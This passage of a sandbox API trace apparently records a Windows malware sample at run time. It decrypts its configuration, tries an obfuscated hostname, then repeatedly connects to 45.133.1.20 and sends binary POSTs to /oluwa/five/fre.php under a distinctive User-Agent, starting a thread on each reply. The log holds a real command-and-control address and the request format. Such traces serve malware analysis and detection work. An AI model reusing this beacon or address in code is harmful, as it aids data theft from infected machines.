(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0266.321] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.321] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0266.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.323] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0266.323] GetProcessHeap () returned 0x6a0000 [0266.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0266.323] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0266.323] GetProcessHeap () returned 0x6a0000 [0266.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0266.324] GetProcessHeap () returned 0x6a0000 [0266.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0266.325] GetProcessHeap () returned 0x6a0000 [0266.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0266.327] GetProcessHeap () returned 0x6a0000 [0266.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0266.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.329] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0266.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.336] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0266.427] GetProcessHeap () returned 0x6a0000 [0266.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0266.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.428] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0266.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.429] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0266.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.430] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.430] GetProcessHeap () returned 0x6a0000 [0266.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0266.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.432] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0266.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.433] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0266.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.434] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0266.434] GetProcessHeap () returned 0x6a0000 [0266.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0266.434] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.435] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0266.436] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.437] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0266.437] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.438] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0266.438] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.439] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0266.439] GetProcessHeap () returned 0x6a0000 [0266.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0266.439] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0266.439] GetProcessHeap () returned 0x6a0000 [0266.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0266.439] socket (af=2, type=1, protocol=6) returned 0x940 [0266.440] connect (s=0x940, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0266.466] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0266.467] GetProcessHeap () returned 0x6a0000 [0266.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0266.467] GetProcessHeap () returned 0x6a0000 [0266.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0266.467] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0266.468] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0266.468] GetProcessHeap () returned 0x6a0000 [0266.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba2f0 [0266.468] GetProcessHeap () returned 0x6a0000 [0266.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0266.469] GetProcessHeap () returned 0x6a0000 [0266.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0266.469] GetProcessHeap () returned 0x6a0000 [0266.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0266.471] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0266.482] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0266.482] GetProcessHeap () returned 0x6a0000 [0266.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0266.482] GetProcessHeap () returned 0x6a0000 [0266.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0266.483] send (s=0x940, buf=0x6bd460*, len=242, flags=0) returned 242 [0266.484] send (s=0x940, buf=0x6bb998*, len=159, flags=0) returned 159 [0266.484] GetProcessHeap () returned 0x6a0000 [0266.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0266.484] recv (in: s=0x940, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0266.555] GetProcessHeap () returned 0x6a0000 [0266.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0266.556] GetProcessHeap () returned 0x6a0000 [0266.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0266.559] GetProcessHeap () returned 0x6a0000 [0266.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba2f0 | out: hHeap=0x6a0000) returned 1 [0266.559] GetProcessHeap () returned 0x6a0000 [0266.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0266.560] closesocket (s=0x940) returned 0 [0266.561] GetProcessHeap () returned 0x6a0000 [0266.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0266.561] GetProcessHeap () returned 0x6a0000 [0266.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0266.561] GetProcessHeap () returned 0x6a0000 [0266.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0266.562] GetProcessHeap () returned 0x6a0000 [0266.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0266.562] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16bc) returned 0x940 [0266.565] Sleep (dwMilliseconds=0xea60) [0266.566] GetProcessHeap () returned 0x6a0000 [0266.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0266.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.567] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0266.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.576] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0266.585] GetProcessHeap () returned 0x6a0000 [0266.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0266.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.587] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0266.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.588] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0266.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.590] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.590] GetProcessHeap () returned 0x6a0000 [0266.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0266.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.594] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0266.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.622] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0266.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.627] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0266.627] GetProcessHeap () returned 0x6a0000 [0266.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0266.628] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.628] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0266.629] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.629] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0266.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.630] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0266.631] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.631] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0266.631] GetProcessHeap () returned 0x6a0000 [0266.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0266.631] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0266.632] GetProcessHeap () returned 0x6a0000 [0266.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0266.632] GetProcessHeap () returned 0x6a0000 [0266.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0266.633] GetProcessHeap () returned 0x6a0000 [0266.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0266.633] GetProcessHeap () returned 0x6a0000 [0266.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0266.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.635] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0266.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.640] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0266.648] GetProcessHeap () returned 0x6a0000 [0266.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0266.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.649] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0266.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.650] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0266.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.651] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.651] GetProcessHeap () returned 0x6a0000 [0266.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0266.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.652] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0266.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.653] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0266.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.654] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0266.655] GetProcessHeap () returned 0x6a0000 [0266.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0266.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.655] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0266.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.657] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0266.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.658] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0266.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.659] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0266.659] GetProcessHeap () returned 0x6a0000 [0266.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0266.659] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0266.659] GetProcessHeap () returned 0x6a0000 [0266.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9f0 [0266.659] socket (af=2, type=1, protocol=6) returned 0x944 [0266.659] connect (s=0x944, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0266.685] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0266.685] GetProcessHeap () returned 0x6a0000 [0266.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0266.685] GetProcessHeap () returned 0x6a0000 [0266.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0266.686] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0266.687] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0266.687] GetProcessHeap () returned 0x6a0000 [0266.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9f30 [0266.687] GetProcessHeap () returned 0x6a0000 [0266.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0266.688] GetProcessHeap () returned 0x6a0000 [0266.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0266.688] GetProcessHeap () returned 0x6a0000 [0266.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0266.690] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0266.691] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0266.691] GetProcessHeap () returned 0x6a0000 [0266.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0266.692] GetProcessHeap () returned 0x6a0000 [0266.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0266.692] send (s=0x944, buf=0x6bd460*, len=242, flags=0) returned 242 [0266.693] send (s=0x944, buf=0x6bb998*, len=159, flags=0) returned 159 [0266.693] GetProcessHeap () returned 0x6a0000 [0266.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0266.693] recv (in: s=0x944, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0266.800] GetProcessHeap () returned 0x6a0000 [0266.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0266.803] GetProcessHeap () returned 0x6a0000 [0266.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0266.803] GetProcessHeap () returned 0x6a0000 [0266.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9f30 | out: hHeap=0x6a0000) returned 1 [0266.804] GetProcessHeap () returned 0x6a0000 [0266.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0266.804] closesocket (s=0x944) returned 0 [0266.805] GetProcessHeap () returned 0x6a0000 [0266.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9f0 | out: hHeap=0x6a0000) returned 1 [0266.805] GetProcessHeap () returned 0x6a0000 [0266.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0266.806] GetProcessHeap () returned 0x6a0000 [0266.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0266.806] GetProcessHeap () returned 0x6a0000 [0266.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0266.807] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16c0) returned 0x944 [0266.810] Sleep (dwMilliseconds=0xea60) [0266.811] GetProcessHeap () returned 0x6a0000 [0266.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0266.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.814] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0266.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.947] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0266.971] GetProcessHeap () returned 0x6a0000 [0266.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0266.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0266.972] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0267.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.017] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.018] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.018] GetProcessHeap () returned 0x6a0000 [0267.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0267.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.020] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0267.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.022] CryptDestroyKey (hKey=0x6ad020) returned 1 [0267.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.023] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0267.023] GetProcessHeap () returned 0x6a0000 [0267.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0267.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.025] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0267.026] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.026] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0267.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.029] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0267.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.030] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0267.030] GetProcessHeap () returned 0x6a0000 [0267.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0267.030] 